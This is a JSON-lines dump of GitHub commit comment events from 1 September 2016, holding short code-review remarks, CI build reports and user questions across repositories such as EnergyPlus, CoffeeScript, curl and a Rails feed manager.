{"id":"4500756690","type":"CommitCommentEvent","actor":{"login":"sylvainbarbot"},"repo":{"name":"pixelhumain/communecter"},"payload":{"comment":{"id":18858776,"position":5,"line":307,"path":"views/default/menu/multi_scope.php","commit_id":"4996f71d8e925d2541a2c995215da3c62982bd8a","created_at":"2016-09-01T06:41:51Z","updated_at":"2016-09-01T06:41:51Z","body":"@Kgneo : en mettant le name du postal codes, ça ne fonctionne pas lorsqu'il y a plusieurs code postaux dans la même city. Du coup si je cherche \"Saint Louis\" ça me retourne \"La Riviere\"... Tu as fait ce changement pour une raison ?"}},"created_at":"2016-09-01T06:41:51Z"}
{"id":"4500759932","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858785,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T06:42:50Z","updated_at":"2016-09-01T06:42:50Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2367 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T06:42:50Z"}
{"id":"4500760098","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"yessika21289/codeigniter3-example"},"payload":{"comment":{"id":18858786,"position":1,"line":1,"path":"application/migrations/20160830000000_modify_news.php","commit_id":"723dda2c01a12e31f5bdd578e36f7901247ef059","created_at":"2016-09-01T06:42:54Z","updated_at":"2016-09-01T06:42:54Z","body":"Filename should be higher than previous migration (e.g. 201608030000001_...)"}},"created_at":"2016-09-01T06:42:54Z"}
{"id":"4500763328","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"yessika21289/codeigniter3-example"},"payload":{"comment":{"id":18858792,"position":17,"line":17,"path":"application/migrations/20160830000000_modify_news.php","commit_id":"723dda2c01a12e31f5bdd578e36f7901247ef059","created_at":"2016-09-01T06:43:55Z","updated_at":"2016-09-01T06:43:55Z","body":"null=>false not allowed by sqlite without default value (can just remove for now)"}},"created_at":"2016-09-01T06:43:55Z"}
{"id":"4500764895","type":"CommitCommentEvent","actor":{"login":"Helehelehele"},"repo":{"name":"DiscordEmotes/website"},"payload":{"comment":{"id":18858795,"position":null,"line":null,"path":null,"commit_id":"afb6ef74a9021bdb353ca92d95c9365a7d82bab9","created_at":"2016-09-01T06:44:25Z","updated_at":"2016-09-01T06:44:25Z","body":"Oh. :/"}},"created_at":"2016-09-01T06:44:25Z"}
{"id":"4500765099","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"yessika21289/codeigniter3-example"},"payload":{"comment":{"id":18858797,"position":29,"line":29,"path":"application/migrations/20160830000000_modify_news.php","commit_id":"723dda2c01a12e31f5bdd578e36f7901247ef059","created_at":"2016-09-01T06:44:29Z","updated_at":"2016-09-01T06:44:29Z","body":"This is not the correct drop() operation :) (Should be remove columns)"}},"created_at":"2016-09-01T06:44:29Z"}
{"id":"4500767544","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858800,"position":10,"line":9,"path":"app/controllers/feed/imports_controller.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-01T06:45:12Z","updated_at":"2016-09-01T06:45:12Z","body":"Yeah, it would've :)"}},"created_at":"2016-09-01T06:45:12Z"}
{"id":"4500769011","type":"CommitCommentEvent","actor":{"login":"BackSlasher"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858802,"position":11,"line":243,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T06:45:37Z","updated_at":"2016-09-01T06:45:37Z","body":"Did not know. Will check and get back to you. Thanks\n\n*Nitzan Raz*\nhttp://backslasher.net\n\nOn Thu, Sep 1, 2016 at 9:12 AM, Claus Vium <notifications@github.com> wrote:\n\n> The current code doesn't work for episodes for me.\n>\n> The newest release? I made some changes to the code yesterday that were\n> released a few hours ago.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Flexget/Flexget/commit/aaf1a69384586dc5bd18e42462693ac4d37b2bcb#commitcomment-18858547>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AG3Hew2oqcMz-VtzCO1UIFEyYUcdg7hTks5qlmzjgaJpZM4JxyF7>\n> .\n>\n"}},"created_at":"2016-09-01T06:45:37Z"}
{"id":"4500770257","type":"CommitCommentEvent","actor":{"login":"viki27"},"repo":{"name":"viki27/hello-world"},"payload":{"comment":{"id":18858803,"position":2,"line":2,"path":"README.md","commit_id":"ad7fae234e99df29c249e3cc47302e9241e7da0f","created_at":"2016-09-01T06:45:59Z","updated_at":"2016-09-01T06:45:59Z","body":"the git project is started."}},"created_at":"2016-09-01T06:45:59Z"}
{"id":"4500770319","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858804,"position":11,"line":10,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-01T06:46:01Z","updated_at":"2016-09-01T06:46:01Z","body":"It will make more sense in the later commits, when I use its content_type attribute"}},"created_at":"2016-09-01T06:46:01Z"}
{"id":"4500771899","type":"CommitCommentEvent","actor":{"login":"matts1"},"repo":{"name":"Karl-Krauth/COMP6771-tests"},"payload":{"comment":{"id":18858809,"position":31,"line":31,"path":"asst2/MattTests.cpp","commit_id":"dd27dbbe6987ab62d4cad706f132774c82b2110b","created_at":"2016-09-01T06:46:28Z","updated_at":"2016-09-01T06:46:28Z","body":"It works on my machine, so presumably. Line 83 should probably just be std::move(v2), cause there's no need to add the * 2 in the test.. Line 31 should definitely be there though - it tests self-move assignment."}},"created_at":"2016-09-01T06:46:28Z"}
{"id":"4500771923","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18858810,"position":null,"line":null,"path":null,"commit_id":"152e5c2105aa6b4701923b11096fcc30284ea848","created_at":"2016-09-01T06:46:28Z","updated_at":"2016-09-01T06:46:28Z","body":"ok. same thing here https://travis-ci.org/curl/curl/jobs/156357206#L8430\r\n\r\n> My guess is that homebrew nghttpx was built with xcode7.2 or earlier.\r\n\r\n@DomT4 can you confirm\r\n\r\n\r\n"}},"created_at":"2016-09-01T06:46:28Z"}
{"id":"4500772204","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858811,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T06:46:33Z","updated_at":"2016-09-01T06:46:33Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T06:46:33Z"}
{"id":"4500772509","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858812,"position":13,"line":12,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-01T06:46:39Z","updated_at":"2016-09-01T06:46:39Z","body":"I just wanted them to be persisted faster"}},"created_at":"2016-09-01T06:46:39Z"}
{"id":"4500772670","type":"CommitCommentEvent","actor":{"login":"viki27"},"repo":{"name":"viki27/hello-world"},"payload":{"comment":{"id":18858813,"position":2,"line":2,"path":"README.md","commit_id":"ad7fae234e99df29c249e3cc47302e9241e7da0f","created_at":"2016-09-01T06:46:42Z","updated_at":"2016-09-01T06:46:42Z","body":"on the 4th day"}},"created_at":"2016-09-01T06:46:42Z"}
{"id":"4500776081","type":"CommitCommentEvent","actor":{"login":"tapooll"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":18858821,"position":null,"line":null,"path":null,"commit_id":"eee94a370f014fdcd826cd725bd5a833267bc4d3","created_at":"2016-09-01T06:47:44Z","updated_at":"2016-09-01T06:47:44Z","body":"Aika huonoo työtä"}},"created_at":"2016-09-01T06:47:44Z"}
{"id":"4500777250","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858824,"position":11,"line":37,"path":"test/services/import_feed_service_test.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-01T06:48:04Z","updated_at":"2016-09-01T06:48:04Z","body":"Yeah, you're right.."}},"created_at":"2016-09-01T06:48:04Z"}
{"id":"4500778312","type":"CommitCommentEvent","actor":{"login":"tapooll"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":18858827,"position":null,"line":null,"path":null,"commit_id":"9ae4dad044adff853e49584cd946ae22776e667e","created_at":"2016-09-01T06:48:24Z","updated_at":"2016-09-01T06:48:24Z","body":"olen ylpeämpi sinusta kuin ankasta"}},"created_at":"2016-09-01T06:48:24Z"}
{"id":"4500778329","type":"CommitCommentEvent","actor":{"login":"viki27"},"repo":{"name":"viki27/hello-world"},"payload":{"comment":{"id":18858828,"position":1,"line":1,"path":"README.md","commit_id":"ad7fae234e99df29c249e3cc47302e9241e7da0f","created_at":"2016-09-01T06:48:25Z","updated_at":"2016-09-01T06:48:25Z","body":"this is new 2nd line"}},"created_at":"2016-09-01T06:48:25Z"}
{"id":"4500779228","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18858829,"position":null,"line":null,"path":null,"commit_id":"076924166a443ae747784df09b6c5cae822e61bb","created_at":"2016-09-01T06:48:41Z","updated_at":"2016-09-01T06:48:41Z","body":"Should ideally check for towns.empty(), no? "}},"created_at":"2016-09-01T06:48:41Z"}
{"id":"4500783107","type":"CommitCommentEvent","actor":{"login":"danielgustafsson"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":18858833,"position":4,"line":258,"path":"gpMgmt/bin/gppylib/operations/package.py","commit_id":"f848884920895156a2620fecc80f03fe7bf6b762","created_at":"2016-09-01T06:49:51Z","updated_at":"2016-09-01T06:49:51Z","body":"Hmm, not sure how that was missed. I will revert this hunk. Longer term it sounds like gppkg should be updated to not use functionality marked as deprecated but thats another story."}},"created_at":"2016-09-01T06:49:51Z"}
{"id":"4500787275","type":"CommitCommentEvent","actor":{"login":"sonalig10"},"repo":{"name":"mgp25/WART"},"payload":{"comment":{"id":18858843,"position":null,"line":null,"path":null,"commit_id":"55af02176ef51e98d12a20412b85fb1e945b23b2","created_at":"2016-09-01T06:51:06Z","updated_at":"2016-09-01T06:51:06Z","body":"I can not register on WART it always says \"reason: bad token\"\r\n\r\ncan you please help?"}},"created_at":"2016-09-01T06:51:06Z"}
{"id":"4500793191","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858861,"position":27,"line":24,"path":"app/services/import_feed_service.rb","commit_id":"874cfc7f295244d83d3806962911efb6fdb7173d","created_at":"2016-09-01T06:52:53Z","updated_at":"2016-09-01T06:52:53Z","body":"I guess the first one, because it doesn't use a dependency, such as `activerecord-import`, but since they both use active record you can't really say they are scalable."}},"created_at":"2016-09-01T06:52:53Z"}
{"id":"4500795353","type":"CommitCommentEvent","actor":{"login":"cookieSu"},"repo":{"name":"cookieSu/hello-world"},"payload":{"comment":{"id":18858868,"position":null,"line":null,"path":null,"commit_id":"c6bfaa0bb580157bd6c429092ec91dddf271d08c","created_at":"2016-09-01T06:53:32Z","updated_at":"2016-09-01T06:53:32Z","body":"test"}},"created_at":"2016-09-01T06:53:32Z"}
{"id":"4500798481","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858871,"position":27,"line":24,"path":"app/services/import_feed_service.rb","commit_id":"874cfc7f295244d83d3806962911efb6fdb7173d","created_at":"2016-09-01T06:54:29Z","updated_at":"2016-09-01T06:54:29Z","body":"Validation makes the import slower and  I had trust in 2performant's xmls :)"}},"created_at":"2016-09-01T06:54:29Z"}
{"id":"4500800784","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18858880,"position":27,"line":272,"path":"test/modules.coffee","commit_id":"2d60c310aa0a15db69a09b3d99adf4308fbb58cd","created_at":"2016-09-01T06:55:13Z","updated_at":"2016-09-01T06:55:13Z","body":"Why was this test removed? It should be allowed."}},"created_at":"2016-09-01T06:55:13Z"}
{"id":"4500803055","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858885,"position":1,"line":1,"path":"test/fixtures/products.yml","commit_id":"874cfc7f295244d83d3806962911efb6fdb7173d","created_at":"2016-09-01T06:55:50Z","updated_at":"2016-09-01T06:55:50Z","body":"I thought that I'll use them somehow"}},"created_at":"2016-09-01T06:55:50Z"}
{"id":"4500806894","type":"CommitCommentEvent","actor":{"login":"mazharoddin"},"repo":{"name":"mazharoddin/camaleon-cms"},"payload":{"comment":{"id":18858893,"position":null,"line":null,"path":null,"commit_id":"fdca7e70e89215b4ee33b34a6175eeaac6f8ffb7","created_at":"2016-09-01T06:56:59Z","updated_at":"2016-09-01T06:56:59Z","body":"ohh ok, I was just referring to general dependency issues we face if we have Gemfile.lock file checked in, as it will try to install the gems instead of using available gems on the system.\r\n If Gemfile.lock is mandatory for circleci then you can proceed  further. Thanks."}},"created_at":"2016-09-01T06:56:59Z"}
{"id":"4500810172","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858899,"position":12,"line":36,"path":"test/services/import_feed_service_test.rb","commit_id":"874cfc7f295244d83d3806962911efb6fdb7173d","created_at":"2016-09-01T06:58:01Z","updated_at":"2016-09-01T06:58:01Z","body":"An easy way to see the execution time of the service"}},"created_at":"2016-09-01T06:58:01Z"}
{"id":"4500812212","type":"CommitCommentEvent","actor":{"login":"GeoffreyBooth"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18858903,"position":27,"line":272,"path":"test/modules.coffee","commit_id":"2d60c310aa0a15db69a09b3d99adf4308fbb58cd","created_at":"2016-09-01T06:58:39Z","updated_at":"2016-09-01T06:58:39Z","body":"Why are we disallowing\r\n```js\r\nimport foo, bar, from 'lib'\r\n```\r\nbut allowing\r\n```js\r\nimport { foo, bar, } from 'lib'\r\n```\r\n?\r\n\r\nIt’s tricky to write the grammar to allow one and not the other."}},"created_at":"2016-09-01T06:58:39Z"}
{"id":"4500817284","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858908,"position":8,"line":9,"path":"app/controllers/feeds_controller.rb","commit_id":"659465dea287f0f4c528e45a98e5ac96026d4dca","created_at":"2016-09-01T07:00:04Z","updated_at":"2016-09-01T07:00:04Z","body":"Yes, it does. \r\nI even thought of not having the user model, because the task said that an authentication is needed, not users."}},"created_at":"2016-09-01T07:00:04Z"}
{"id":"4500818050","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18858911,"position":null,"line":null,"path":null,"commit_id":"fa76e9b0149285d3887d8dac163b5153555af458","created_at":"2016-09-01T07:00:16Z","updated_at":"2016-09-01T07:00:16Z","body":"EP-6-6 (macumber) - x86_64-MacOS-10.10-clang: OK (2387 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.51%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T07:00:16Z"}
{"id":"4500822671","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":18858936,"position":27,"line":272,"path":"test/modules.coffee","commit_id":"2d60c310aa0a15db69a09b3d99adf4308fbb58cd","created_at":"2016-09-01T07:01:23Z","updated_at":"2016-09-01T07:01:23Z","body":"Because that’s the way JavaScript does it. You’ll figure it out :)"}},"created_at":"2016-09-01T07:01:23Z"}
{"id":"4500824728","type":"CommitCommentEvent","actor":{"login":"tobli"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":18858940,"position":null,"line":null,"path":null,"commit_id":"a298eb341c2c534723d2f92ec59ab155ab9e0b99","created_at":"2016-09-01T07:02:00Z","updated_at":"2016-09-01T07:02:00Z","body":"Query parsing isn't correct yet. But it won't crash at least. Will follow up."}},"created_at":"2016-09-01T07:02:00Z"}
{"id":"4500826701","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"Angizd/Smallwebpage"},"payload":{"comment":{"id":18858943,"position":null,"line":null,"path":null,"commit_id":"b61df66dbe5f1d2a511b4e417c5281064a9cb719","created_at":"2016-09-01T07:02:31Z","updated_at":"2016-09-01T07:02:31Z","body":"Looking good, just a pointer: Keeping indentation consistent and correct in your HTML makes it easier for you and others to read. Let's correct that."}},"created_at":"2016-09-01T07:02:31Z"}
{"id":"4500830518","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858949,"position":19,"line":30,"path":"test/services/import_feed_service_test.rb","commit_id":"d9670df18c729f6372a17f19087c3612c6fab5e0","created_at":"2016-09-01T07:03:33Z","updated_at":"2016-09-01T07:03:33Z","body":"I thought that this test was redundant, but I wasn't sure. "}},"created_at":"2016-09-01T07:03:33Z"}
{"id":"4500833385","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18858959,"position":null,"line":null,"path":null,"commit_id":"076924166a443ae747784df09b6c5cae822e61bb","created_at":"2016-09-01T07:04:15Z","updated_at":"2016-09-01T07:04:15Z","body":"Ideally yes, but size() check is also acceptable."}},"created_at":"2016-09-01T07:04:15Z"}
{"id":"4500838932","type":"CommitCommentEvent","actor":{"login":"qinghua2016"},"repo":{"name":"plowman/python-mcparseface"},"payload":{"comment":{"id":18858972,"position":null,"line":null,"path":null,"commit_id":"6855006b8fa08b90f173653295fed3d4d9713277","created_at":"2016-09-01T07:05:47Z","updated_at":"2016-09-01T07:05:47Z","body":"I have sucessfully run the demo.sh. But when I run pyparseface.py, it print the error \"ImportError: cannot import name tf_logging\". Do you know why?"}},"created_at":"2016-09-01T07:05:47Z"}
{"id":"4500841581","type":"CommitCommentEvent","actor":{"login":"matz3"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18858988,"position":null,"line":null,"path":null,"commit_id":"9bf2b33c06baf7c935a2b93cdf2381151f0427fb","created_at":"2016-09-01T07:06:30Z","updated_at":"2016-09-01T07:06:30Z","body":"This commit fixes https://github.com/SAP/openui5/issues/1112"}},"created_at":"2016-09-01T07:06:30Z"}
{"id":"4500841673","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18858989,"position":5,"line":5,"path":"app/models/product.rb","commit_id":"b55e2141e1221e7c4a2d14c4efec0a4a0edcb656","created_at":"2016-09-01T07:06:32Z","updated_at":"2016-09-01T07:06:32Z","body":"In case the image_urls string would have more than one urls, it would return an array of those urls. \r\nBut I wasn't sure it could have more than one. I just assumed it because its 'image_urls' is plural"}},"created_at":"2016-09-01T07:06:32Z"}
{"id":"4500841964","type":"CommitCommentEvent","actor":{"login":"jem-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18858992,"position":null,"line":null,"path":null,"commit_id":"d6af11da6a5d6c622fd9e15f0283535972638d0a","created_at":"2016-09-01T07:06:37Z","updated_at":"2016-09-01T07:06:37Z","body":":tada: "}},"created_at":"2016-09-01T07:06:37Z"}
{"id":"4500844295","type":"CommitCommentEvent","actor":{"login":"WUDAXUAN"},"repo":{"name":"WUDAXUAN/hush"},"payload":{"comment":{"id":18859003,"position":null,"line":null,"path":null,"commit_id":"392bb8e8f0a4db13fb865ee7ef56f7cb181c6d8e","created_at":"2016-09-01T07:07:16Z","updated_at":"2016-09-01T07:07:16Z","body":"其实我也不知道这是个什么鬼 但是吧  感觉应该是个好玩的东西  所以我就试了一下  恩  还不错"}},"created_at":"2016-09-01T07:07:16Z"}
{"id":"4500845682","type":"CommitCommentEvent","actor":{"login":"mylovebyebyebye"},"repo":{"name":"mylovebyebyebye/YuanZM"},"payload":{"comment":{"id":18859004,"position":null,"line":null,"path":null,"commit_id":"53c45ddb9ebaf28aae14a01498a714f4547b0a92","created_at":"2016-09-01T07:07:37Z","updated_at":"2016-09-01T07:07:37Z","body":"ok?"}},"created_at":"2016-09-01T07:07:37Z"}
{"id":"4500846998","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"jaels/Sprint-website"},"payload":{"comment":{"id":18859007,"position":null,"line":null,"path":null,"commit_id":"74e939a5025ef14b5f7f7f59fb427579aa53529b","created_at":"2016-09-01T07:07:58Z","updated_at":"2016-09-01T07:07:58Z","body":"please review the indentation in your HTML file. keeping indentation with nested elements correct helps you and other read and understand your code."}},"created_at":"2016-09-01T07:07:58Z"}
{"id":"4500847464","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18859008,"position":8,"line":5,"path":"test/models/product_test.rb","commit_id":"f6aac0f6fd927095446b5b0227408f18a166ce69","created_at":"2016-09-01T07:08:07Z","updated_at":"2016-09-01T07:08:07Z","body":":/ forgot about testing that"}},"created_at":"2016-09-01T07:08:07Z"}
{"id":"4500850892","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18859017,"position":3,"line":3,"path":"indico/modules/events/abstracts/templates/management/_notification_tpl_list.html","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-01T07:09:04Z","updated_at":"2016-09-01T07:09:04Z","body":"missing indentation"}},"created_at":"2016-09-01T07:09:04Z"}
{"id":"4500854333","type":"CommitCommentEvent","actor":{"login":"JolieYang"},"repo":{"name":"XVimProject/XVim"},"payload":{"comment":{"id":18859019,"position":15,"line":16,"path":"README.md","commit_id":"3eb09a6ffa68b4bc23b6d0703caea9e6152cd125","created_at":"2016-09-01T07:10:05Z","updated_at":"2016-09-01T07:10:05Z","body":"Xcode8-beta6 can't support,after installing Xcode crash"}},"created_at":"2016-09-01T07:10:05Z"}
{"id":"4500856856","type":"CommitCommentEvent","actor":{"login":"wilddom"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18859028,"position":null,"line":null,"path":null,"commit_id":"ef5145c887817daa646509a592a9f3f6cb10ed88","created_at":"2016-09-01T07:10:43Z","updated_at":"2016-09-01T07:10:43Z","body":"I haven't touched `demo_data/db.sql`, so the new tables aren't yet in it. Anyway, why isn't the same `db.sql` used for installation and demo data?"}},"created_at":"2016-09-01T07:10:43Z"}
{"id":"4500858578","type":"CommitCommentEvent","actor":{"login":"htgoebel"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":18859031,"position":8,"line":138,"path":"PyInstaller/building/toc_conversion.py","commit_id":"fa71f4420bd0b617f4f7d45a2d5c4fe2bbeeebb4","created_at":"2016-09-01T07:11:12Z","updated_at":"2016-09-01T07:11:12Z","body":"Please add a comment like: ignore if directory already exists."}},"created_at":"2016-09-01T07:11:12Z"}
{"id":"4500861888","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"bigmickeystyle/sprint-website"},"payload":{"comment":{"id":18859042,"position":50,"line":57,"path":"style.css","commit_id":"d57a02e13e4c97cf2cd33d087c4ae014f4e264b5","created_at":"2016-09-01T07:12:05Z","updated_at":"2016-09-01T07:12:05Z","body":"this is fine for now but in general it is only a good idea to assign styles on element level when you really truly want to change it on the whole website. "}},"created_at":"2016-09-01T07:12:05Z"}
{"id":"4500862331","type":"CommitCommentEvent","actor":{"login":"htgoebel"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":18859043,"position":8,"line":138,"path":"PyInstaller/building/toc_conversion.py","commit_id":"fa71f4420bd0b617f4f7d45a2d5c4fe2bbeeebb4","created_at":"2016-09-01T07:12:12Z","updated_at":"2016-09-01T07:12:12Z","body":"And please add a marker: \"todo: python 3 only: use os.makedirs(workpath, exist_ok=True)\" So we'll spot this palce to cleanup easier somewhen later.\r\nThanks."}},"created_at":"2016-09-01T07:12:12Z"}
{"id":"4500863753","type":"CommitCommentEvent","actor":{"login":"pmuens"},"repo":{"name":"serverless/serverless"},"payload":{"comment":{"id":18859053,"position":45,"line":279,"path":"lib/plugins/aws/deploy/compile/events/apiGateway/lib/methods.js","commit_id":"d6d2f83bee520721c650b0b87cc5789f0836c2c2","created_at":"2016-09-01T07:12:30Z","updated_at":"2016-09-01T07:12:30Z","body":"@anreved yes, you're right. You'll always have 2 mappings setup.\r\n\r\nYou could overwrite this behavior with the custom resource section in the `serverless.yml` file.\r\nWould be cool if you could open up an issue so that we can discuss your specific use case there 👍 "}},"created_at":"2016-09-01T07:12:30Z"}
{"id":"4500866285","type":"CommitCommentEvent","actor":{"login":"qingweibinary"},"repo":{"name":"binary-com/binary-next-gen"},"payload":{"comment":{"id":18859060,"position":18,"line":30,"path":"src/contract-details/mobile/ContractDetailsMobileLayout.js","commit_id":"32aeea6308f8d521f673c5f0bb5d61426c175cd0","created_at":"2016-09-01T07:13:10Z","updated_at":"2016-09-01T07:13:10Z","body":"Wouldnt recreate chart make things slower?"}},"created_at":"2016-09-01T07:13:10Z"}
{"id":"4500869383","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859064,"position":6,"line":17,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T07:14:00Z","updated_at":"2016-09-01T07:14:00Z","body":"used sample, otherwise cut.integer won't be used"}},"created_at":"2016-09-01T07:14:00Z"}
{"id":"4500875756","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/Angularjs"},"payload":{"comment":{"id":18859079,"position":4,"line":55,"path":"app/scripts/app_dishcontroller.js","commit_id":"ff56717c11fab43ce85f3ec81113761d9e3a0d77","created_at":"2016-09-01T07:15:44Z","updated_at":"2016-09-01T07:15:44Z","body":"No need rootScope, Everything is done in the child funciton."}},"created_at":"2016-09-01T07:15:44Z"}
{"id":"4500875952","type":"CommitCommentEvent","actor":{"login":"GodTanu"},"repo":{"name":"GodTanu/NEMJPManual.github.io"},"payload":{"comment":{"id":18859080,"position":null,"line":null,"path":null,"commit_id":"a3e2e3e6b8673e72c85db52738e07dc5a580da85","created_at":"2016-09-01T07:15:48Z","updated_at":"2016-09-01T07:15:48Z","body":"<a href=\"https://twitter.com/share\" class=\"twitter-share-button\" data-url=\"http://nemmanual.net/delegated_harvesting.html\" data-text=\"デリゲート(委任)ハーベスティングの利用方法\">Tweetする</a>\r\n"}},"created_at":"2016-09-01T07:15:48Z"}
{"id":"4500878529","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":18859084,"position":5,"line":30,"path":"test/e2e/pages/invite.js","commit_id":"246ffeb4214cd2a8d31fcd0d0b5302203ff7c20b","created_at":"2016-09-01T07:16:32Z","updated_at":"2016-09-01T07:16:32Z","body":"Why?? :open_mouth: "}},"created_at":"2016-09-01T07:16:32Z"}
{"id":"4500881784","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/Angularjs"},"payload":{"comment":{"id":18859093,"position":15,"line":65,"path":"app/scripts/app_dishcontroller.js","commit_id":"ff56717c11fab43ce85f3ec81113761d9e3a0d77","created_at":"2016-09-01T07:17:23Z","updated_at":"2016-09-01T07:17:23Z","body":"The main problem was the push function, it was directly connected to the $scope, Hence whenever  the setPristine function kicks in, the comment goes blank in both the section(the comment and the pushed one)."}},"created_at":"2016-09-01T07:17:23Z"}
